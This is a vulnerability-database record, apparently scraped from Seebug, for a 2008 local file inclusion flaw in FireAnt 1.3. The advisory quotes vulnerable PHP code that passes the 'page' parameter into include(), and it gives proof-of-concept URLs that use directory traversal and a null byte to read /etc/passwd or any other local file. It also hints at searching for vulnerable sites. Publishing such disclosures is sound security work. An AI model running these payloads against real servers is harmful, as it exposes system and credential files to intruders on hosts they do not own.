Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-8782", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-06-21T00:00:00", "title": "FireAnt 1.3 (index.php page) Local File Inclusion Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-8782", "cvelist": [], "description": "No description provided by source.", "viewCount": 4, "published": "2008-06-21T00:00:00", "sourceData": "\n ###################################################################################\r\n#\r\n# Name : FireAnt v1.3 Local File Inclusion Vulnerability\r\n# Author : cOndemned\r\n# Dork : use Your brain (:\r\n# Greetz : ZaBeaTy, str0ke, GregStar, irk4z, Sandtalker & Avantura ;**\r\n#\r\n###################################################################################\r\n\r\nSource :\r\n\r\n // index.php\r\n\r\n 8. $page = "bug_list"; //default page\r\n 9. if (!empty($_GET['page'])) {\r\n 10. $page = strip_tags($_GET['page']);\r\n \r\n 99. if (file_exists("./".$page.".php")) { \r\n \r\n 104. include("./".$page.".php"); \r\n\r\n \r\nProof of Concept :\r\n\r\n http://[host]/[FireAnt1.3]/index.php?page=../../../../etc/passwd%00\r\n http://[host]/[FireAnt1.3]/index.php?page=../../../../[local_file]%00\n ", "id": "SSV:8782", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:49:09", "reporter": "Root", "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647539763}}
{}
FireAnt 1.3 (index.php page) Local File Inclusion Vulnerability